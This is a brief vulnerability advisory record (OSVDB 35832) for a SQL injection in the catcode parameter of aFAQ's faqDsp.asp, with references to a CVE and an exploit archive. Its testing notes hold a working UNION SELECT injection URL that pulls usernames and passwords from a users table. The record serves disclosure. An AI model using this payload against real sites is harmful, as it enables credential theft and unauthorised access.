aFAQ faqDsp.asp catcode Variable SQL Injection

2006-12-28T00:00:00
ID OSVDB:35832
Type osvdb
Reporter OSVDB
Modified 2006-12-28T00:00:00

Description

Manual Testing Notes

http://[target]/[path]//faqDsp.asp?catcode=-1%20union%20select%20username,password,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

References:

ISS X-Force ID: 31130 Generic Exploit URL: http://milw0rm.com/exploits/3031 CVE-2006-6831